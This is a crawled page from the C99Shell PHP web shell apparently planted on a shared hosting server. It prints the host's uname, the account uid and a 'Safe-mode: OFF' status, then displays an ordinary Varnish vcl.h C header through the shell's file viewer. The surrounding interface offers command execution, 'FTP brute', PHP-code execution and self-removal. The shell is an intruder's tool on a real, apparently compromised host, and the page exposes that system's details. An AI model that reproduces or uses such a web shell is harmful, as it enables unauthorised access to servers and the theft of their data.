!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux web25.us.cloudlogin.co 5.10.237-xeon-hst #1 SMP Mon May 5 15:10:04 UTC 2025 x86_64 

uid=233359(alpastrology) gid=888(tty) groups=888(tty),33(tape) 

Safe-mode: OFF (not secure)

/usr/include/varnish/   drwxr-xr-x
Free 6182.22 GB of 6263.43 GB (98.7%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     vcl.h (3.91 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/*
 * NB:  This file is machine generated, DO NOT EDIT!
 *
 * Edit and run lib/libvcc/generate.py instead.
 */


#ifdef VCL_H_INCLUDED
#  error "vcl.h included multiple times"
#endif
#define VCL_H_INCLUDED

#ifndef VRT_H_INCLUDED
#  error "include vrt.h before vcl.h"
#endif

/* VCL Methods */
#define VCL_MET_RECV            (1U << 1)
#define VCL_MET_PIPE            (1U << 2)
#define VCL_MET_PASS            (1U << 3)
#define VCL_MET_HASH            (1U << 4)
#define VCL_MET_PURGE            (1U << 5)
#define VCL_MET_MISS            (1U << 6)
#define VCL_MET_HIT            (1U << 7)
#define VCL_MET_DELIVER            (1U << 8)
#define VCL_MET_SYNTH            (1U << 9)
#define VCL_MET_BACKEND_FETCH        (1U << 10)
#define VCL_MET_BACKEND_RESPONSE    (1U << 11)
#define VCL_MET_BACKEND_ERROR        (1U << 12)
#define VCL_MET_INIT            (1U << 13)
#define VCL_MET_FINI            (1U << 14)

#define VCL_MET_MAX            15

#define VCL_MET_MASK            0x7fff

#define VCL_MET_TASK_B            ( VCL_MET_BACKEND_FETCH | \
                      VCL_MET_BACKEND_RESPONSE | \
                      VCL_MET_BACKEND_ERROR )
#define VCL_MET_TASK_C            ( VCL_MET_RECV | \
                      VCL_MET_PIPE | \
                      VCL_MET_PASS | \
                      VCL_MET_HASH | \
                      VCL_MET_PURGE | \
                      VCL_MET_MISS | \
                      VCL_MET_HIT | \
                      VCL_MET_DELIVER | \
                      VCL_MET_SYNTH )
#define VCL_MET_TASK_H            ( VCL_MET_INIT | \
                      VCL_MET_FINI )

/* VCL Returns */
#define VCL_RET_ABANDON            1
#define VCL_RET_DELIVER            2
#define VCL_RET_ERROR            3
#define VCL_RET_FAIL            4
#define VCL_RET_FETCH            5
#define VCL_RET_HASH            6
#define VCL_RET_LOOKUP            7
#define VCL_RET_MISS            8
#define VCL_RET_OK            9
#define VCL_RET_PASS            10
#define VCL_RET_PIPE            11
#define VCL_RET_PURGE            12
#define VCL_RET_RESTART            13
#define VCL_RET_RETRY            14
#define VCL_RET_SYNTH            15
#define VCL_RET_VCL            16

#define VCL_RET_MAX            17

/* VCL Types */
extern const struct vrt_type VCL_TYPE_ACL[1];
extern const struct vrt_type VCL_TYPE_BACKEND[1];
extern const struct vrt_type VCL_TYPE_BLOB[1];
extern const struct vrt_type VCL_TYPE_BODY[1];
extern const struct vrt_type VCL_TYPE_BOOL[1];
extern const struct vrt_type VCL_TYPE_BYTES[1];
extern const struct vrt_type VCL_TYPE_DURATION[1];
extern const struct vrt_type VCL_TYPE_ENUM[1];
extern const struct vrt_type VCL_TYPE_HEADER[1];
extern const struct vrt_type VCL_TYPE_HTTP[1];
extern const struct vrt_type VCL_TYPE_INSTANCE[1];
extern const struct vrt_type VCL_TYPE_INT[1];
extern const struct vrt_type VCL_TYPE_IP[1];
extern const struct vrt_type VCL_TYPE_PROBE[1];
extern const struct vrt_type VCL_TYPE_REAL[1];
extern const struct vrt_type VCL_TYPE_STEVEDORE[1];
extern const struct vrt_type VCL_TYPE_STRANDS[1];
extern const struct vrt_type VCL_TYPE_STRING[1];
extern const struct vrt_type VCL_TYPE_STRINGS[1];
extern const struct vrt_type VCL_TYPE_STRING_LIST[1];
extern const struct vrt_type VCL_TYPE_SUB[1];
extern const struct vrt_type VCL_TYPE_TIME[1];
extern const struct vrt_type VCL_TYPE_VCL[1];
extern const struct vrt_type VCL_TYPE_VOID[1];

/* Compiled VCL Interface */
typedef int vcl_event_f(VRT_CTX, enum vcl_event_e);
typedef int vcl_init_f(VRT_CTX);
typedef void vcl_fini_f(VRT_CTX);
typedef void vcl_func_f(VRT_CTX);

struct VCL_conf {
    unsigned            magic;
#define VCL_CONF_MAGIC          0x7406c509      /* from /dev/random */

    unsigned            syntax;
    struct director         **default_director;
    const struct vrt_backend_probe  *default_probe;
    unsigned            nref;
    const struct vrt_ref        *ref;

    unsigned            nsrc;
    const char              **srcname;
    const char              **srcbody;

    unsigned            nvmod;

    vcl_event_f             *event_vcl;
    vcl_func_f            *recv_func;
    vcl_func_f            *pipe_func;
    vcl_func_f            *pass_func;
    vcl_func_f            *hash_func;
    vcl_func_f            *purge_func;
    vcl_func_f            *miss_func;
    vcl_func_f            *hit_func;
    vcl_func_f            *deliver_func;
    vcl_func_f            *synth_func;
    vcl_func_f            *backend_fetch_func;
    vcl_func_f            *backend_response_func;
    vcl_func_f            *backend_error_func;
    vcl_func_f            *init_func;
    vcl_func_f            *fini_func;

};

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0117 ]--